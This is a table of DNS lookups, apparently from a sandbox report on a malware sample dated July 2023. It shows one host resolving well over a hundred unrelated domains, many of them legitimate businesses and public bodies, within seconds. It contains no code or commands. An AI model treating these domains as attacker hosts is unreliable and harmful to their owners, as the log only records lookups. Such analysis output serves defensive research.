                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.905420065 CEST8.8.8.8192.168.2.60x7b05No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.906126022 CEST8.8.8.8192.168.2.60x40e6No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.906126022 CEST8.8.8.8192.168.2.60x40e6No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.937937021 CEST8.8.8.8192.168.2.60x6d3eNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.023068905 CEST8.8.8.8192.168.2.60x85cdServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.047842979 CEST8.8.8.8192.168.2.60xd402No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.082302094 CEST8.8.8.8192.168.2.60x9e4No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.082302094 CEST8.8.8.8192.168.2.60x9e4No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.095346928 CEST8.8.8.8192.168.2.60x660fNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.095346928 CEST8.8.8.8192.168.2.60x660fNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.095346928 CEST8.8.8.8192.168.2.60x660fNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.095346928 CEST8.8.8.8192.168.2.60x660fNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.172508001 CEST8.8.8.8192.168.2.60x210aNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.196213007 CEST8.8.8.8192.168.2.60x53bNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.196213007 CEST8.8.8.8192.168.2.60x53bNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.226252079 CEST8.8.8.8192.168.2.60xc5b8Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.228399992 CEST8.8.8.8192.168.2.60xfc8eNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.244137049 CEST8.8.8.8192.168.2.60x9b59Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.283931017 CEST8.8.8.8192.168.2.60x4330Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.287187099 CEST8.8.8.8192.168.2.60x421cNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.299423933 CEST8.8.8.8192.168.2.60x2693Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.373080015 CEST8.8.8.8192.168.2.60xbe50No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.373080015 CEST8.8.8.8192.168.2.60xbe50No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.404674053 CEST8.8.8.8192.168.2.60x64a8No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.407982111 CEST8.8.8.8192.168.2.60x4018Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.426522970 CEST8.8.8.8192.168.2.60x6ca7No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.453161955 CEST8.8.8.8192.168.2.60x2996Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.455710888 CEST8.8.8.8192.168.2.60xb85fServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.483443975 CEST8.8.8.8192.168.2.60xefNo error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.483443975 CEST8.8.8.8192.168.2.60xefNo error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.516143084 CEST8.8.8.8192.168.2.60x93e2No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.526848078 CEST8.8.8.8192.168.2.60x818Server failure (2)com-edit.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.546258926 CEST8.8.8.8192.168.2.60xf69cNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.574841022 CEST8.8.8.8192.168.2.60xa612No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.595649004 CEST8.8.8.8192.168.2.60x132cServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.614885092 CEST8.8.8.8192.168.2.60x354cNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.620889902 CEST8.8.8.8192.168.2.60xa3daNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.652487040 CEST8.8.8.8192.168.2.60xb7d3No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.652487040 CEST8.8.8.8192.168.2.60xb7d3No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.684807062 CEST8.8.8.8192.168.2.60x177Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.700845003 CEST8.8.8.8192.168.2.60x204No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.708451033 CEST8.8.8.8192.168.2.60xbfbbNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.720978022 CEST8.8.8.8192.168.2.60xb60cNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.723541975 CEST8.8.8.8192.168.2.60xeed6No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.725459099 CEST8.8.8.8192.168.2.60x1bb8No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.730731964 CEST8.8.8.8192.168.2.60x6321No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.736421108 CEST8.8.8.8192.168.2.60xac2dNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.757046938 CEST8.8.8.8192.168.2.60xb027No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.791286945 CEST8.8.8.8192.168.2.60x1188No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.806560040 CEST8.8.8.8192.168.2.60x2b0dNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.812372923 CEST8.8.8.8192.168.2.60x7a78Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.827104092 CEST8.8.8.8192.168.2.60x2ed7No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.827104092 CEST8.8.8.8192.168.2.60x2ed7No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.837054968 CEST8.8.8.8192.168.2.60x4957No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.848609924 CEST8.8.8.8192.168.2.60xb1bbNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.866353989 CEST8.8.8.8192.168.2.60x7c31No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.881572962 CEST8.8.8.8192.168.2.60x1930No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.882729053 CEST8.8.8.8192.168.2.60x4d58No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.884334087 CEST8.8.8.8192.168.2.60xc631No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.931032896 CEST8.8.8.8192.168.2.60xb81bNo error (0)assideum.com52.219.94.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.940346003 CEST8.8.8.8192.168.2.60xb88No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.940346003 CEST8.8.8.8192.168.2.60xb88No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.941463947 CEST8.8.8.8192.168.2.60x431aNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.948353052 CEST8.8.8.8192.168.2.60x73e1No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.956235886 CEST8.8.8.8192.168.2.60xbd04No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.956583977 CEST8.8.8.8192.168.2.60xd218No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.956914902 CEST8.8.8.8192.168.2.60xdaa1No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.958311081 CEST8.8.8.8192.168.2.60x1433No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.958311081 CEST8.8.8.8192.168.2.60x1433No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.968854904 CEST8.8.8.8192.168.2.60x8140No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.968854904 CEST8.8.8.8192.168.2.60x8140No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.971272945 CEST8.8.8.8192.168.2.60xafd9No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.971272945 CEST8.8.8.8192.168.2.60xafd9No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.977205038 CEST8.8.8.8192.168.2.60x36caNo error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.977205038 CEST8.8.8.8192.168.2.60x36caNo error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.978760004 CEST8.8.8.8192.168.2.60x124eNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.979734898 CEST8.8.8.8192.168.2.60xb6b7No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.991719007 CEST8.8.8.8192.168.2.60x9b5eNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.993421078 CEST8.8.8.8192.168.2.60xf869No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.995803118 CEST8.8.8.8192.168.2.60x2481No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.039179087 CEST8.8.8.8192.168.2.60x2f0No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.046000957 CEST8.8.8.8192.168.2.60xcceaNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.046000957 CEST8.8.8.8192.168.2.60xcceaNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.046051979 CEST8.8.8.8192.168.2.60xe1e7No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.057698011 CEST8.8.8.8192.168.2.60x3e42No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.059427977 CEST8.8.8.8192.168.2.60xf327No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.072407007 CEST8.8.8.8192.168.2.60x3c1dNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.097137928 CEST8.8.8.8192.168.2.60x330eNo error (0)websy.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.100640059 CEST8.8.8.8192.168.2.60x45a2No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.117651939 CEST8.8.8.8192.168.2.60x5039No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.124854088 CEST8.8.8.8192.168.2.60xbfd0No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.125936031 CEST8.8.8.8192.168.2.60x6d57No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.128165960 CEST8.8.8.8192.168.2.60xe9d6No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.139127970 CEST8.8.8.8192.168.2.60xd7f3No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.164716959 CEST8.8.8.8192.168.2.60xce7No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.164716959 CEST8.8.8.8192.168.2.60xce7No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.167503119 CEST8.8.8.8192.168.2.60x5217No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.190074921 CEST8.8.8.8192.168.2.60xa438No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.199204922 CEST8.8.8.8192.168.2.60xbe35No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.214421988 CEST8.8.8.8192.168.2.60x7257No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.214421988 CEST8.8.8.8192.168.2.60x7257No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.214421988 CEST8.8.8.8192.168.2.60x7257No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.214421988 CEST8.8.8.8192.168.2.60x7257No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.235682964 CEST8.8.8.8192.168.2.60x159bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.247939110 CEST8.8.8.8192.168.2.60x195cServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.255003929 CEST8.8.8.8192.168.2.60xe35No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.268295050 CEST8.8.8.8192.168.2.60xd2c8Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.286149025 CEST8.8.8.8192.168.2.60xf6abNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.286149025 CEST8.8.8.8192.168.2.60xf6abNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.293973923 CEST8.8.8.8192.168.2.60xd471No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.308518887 CEST8.8.8.8192.168.2.60xa041No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.318979979 CEST8.8.8.8192.168.2.60xb98bNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.318979979 CEST8.8.8.8192.168.2.60xb98bNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.318979979 CEST8.8.8.8192.168.2.60xb98bNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331448078 CEST8.8.8.8192.168.2.60xbba5No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331448078 CEST8.8.8.8192.168.2.60xbba5No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331448078 CEST8.8.8.8192.168.2.60xbba5No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331636906 CEST8.8.8.8192.168.2.60x3a34No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331636906 CEST8.8.8.8192.168.2.60x3a34No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331636906 CEST8.8.8.8192.168.2.60x3a34No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.331636906 CEST8.8.8.8192.168.2.60x3a34No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.336668015 CEST8.8.8.8192.168.2.60x856eNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.355911970 CEST8.8.8.8192.168.2.60xb0a7No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.355911970 CEST8.8.8.8192.168.2.60xb0a7No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.380472898 CEST8.8.8.8192.168.2.60xcd6aNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.391196012 CEST8.8.8.8192.168.2.60x7a0cNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.394479036 CEST8.8.8.8192.168.2.60x450fNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.401078939 CEST8.8.8.8192.168.2.60x61d9No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.401374102 CEST8.8.8.8192.168.2.60x2b27No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.403908968 CEST8.8.8.8192.168.2.60xe33fNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.404783010 CEST8.8.8.8192.168.2.60x9a5dNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.408468962 CEST8.8.8.8192.168.2.60xa193No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.416033983 CEST8.8.8.8192.168.2.60x9245No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.437522888 CEST8.8.8.8192.168.2.60x1868Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.438937902 CEST8.8.8.8192.168.2.60x5f58No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.459861040 CEST8.8.8.8192.168.2.60xd393No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.459861040 CEST8.8.8.8192.168.2.60xd393No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.459861040 CEST8.8.8.8192.168.2.60xd393No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.459861040 CEST8.8.8.8192.168.2.60xd393No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.463732958 CEST8.8.8.8192.168.2.60x3559No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.463753939 CEST8.8.8.8192.168.2.60xb68eNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.463753939 CEST8.8.8.8192.168.2.60xb68eNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.471784115 CEST8.8.8.8192.168.2.60xeb61No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.482547045 CEST8.8.8.8192.168.2.60x86dcNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.527896881 CEST8.8.8.8192.168.2.60x320aNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.527896881 CEST8.8.8.8192.168.2.60x320aNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.527896881 CEST8.8.8.8192.168.2.60x320aNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.527896881 CEST8.8.8.8192.168.2.60x320aNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.535953999 CEST8.8.8.8192.168.2.60xdc18No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.539009094 CEST8.8.8.8192.168.2.60x1f09Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.540249109 CEST8.8.8.8192.168.2.60x834bServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.543054104 CEST8.8.8.8192.168.2.60x97No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.543054104 CEST8.8.8.8192.168.2.60x97No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.551350117 CEST8.8.8.8192.168.2.60xaef7No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.588608980 CEST8.8.8.8192.168.2.60x62d3Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.593504906 CEST8.8.8.8192.168.2.60x7fa4Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.618902922 CEST8.8.8.8192.168.2.60xa67bNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.618902922 CEST8.8.8.8192.168.2.60xa67bNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.619097948 CEST8.8.8.8192.168.2.60xd38aName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.654145956 CEST8.8.8.8192.168.2.60x453aName error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.666246891 CEST8.8.8.8192.168.2.60x7012Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.703639984 CEST8.8.8.8192.168.2.60x6d3aNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
